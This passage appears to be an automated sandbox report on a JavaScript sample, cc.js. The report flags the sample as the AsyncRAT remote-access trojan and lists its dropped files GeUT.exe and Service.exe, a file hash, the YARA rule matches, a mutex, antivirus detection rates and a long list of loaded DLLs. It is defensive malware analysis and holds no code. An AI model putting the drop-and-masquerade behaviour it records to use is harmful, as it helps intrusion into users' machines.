Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B37288	11_2_00B37288
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B35208	11_2_00B35208
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B343D0	11_2_00B343D0
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B36450	11_2_00B36450
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B30D33	11_2_00B30D33
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B3727C	11_2_00B3727C
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 13_2_00E113B8	13_2_00E113B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 14_2_00C113B8	14_2_00C113B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 15_2_012313B8	15_2_012313B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 16_2_014213B8	16_2_014213B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_02735208	17_2_02735208
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_02737288	17_2_02737288
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_027343D0	17_2_027343D0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_02736450	17_2_02736450
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_02730D33	17_2_02730D33
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_0273727C	17_2_0273727C
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_02736080	17_2_02736080
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_027361C8	17_2_027361C8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 19_2_017513B8	19_2_017513B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 21_2_030613B8	21_2_030613B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 22_2_012F13B8	22_2_012F13B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 24_2_00B961BC	24_2_00B961BC
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 24_2_00B95208	24_2_00B95208
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 24_2_00B97279	24_2_00B97279
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 24_2_00B943D0	24_2_00B943D0
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 24_2_00B90D32	24_2_00B90D32
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 25_2_04B413B8	25_2_04B413B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 26_2_02DC13B8	26_2_02DC13B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 27_2_00CE13B8	27_2_00CE13B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 28_2_012213B8	28_2_012213B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 29_2_016513B8	29_2_016513B8

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\GeUT.exe 680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Service.exe 680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996

Source: cc.js

Initial sample: Strings found which are bigger than 50

Source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: GeUT.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Service.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: GeUT.exe.0.dr, Program.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.26357946390.0.raw.unpack, Program.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.263586370e0.0.raw.unpack, Program.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Service.exe.2.dr, Program.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winJS@49/5@3/0

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe

File created: C:\Users\user\AppData\Roaming\Service.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Service.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Mutant created: \Sessions\1\BaseNamedObjects\wtYmVE2WY2XGhWlO

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\GeUT.exe

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cc.js	ReversingLabs: Detection: 39%
Source: cc.js	Virustotal: Detection: 31%

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
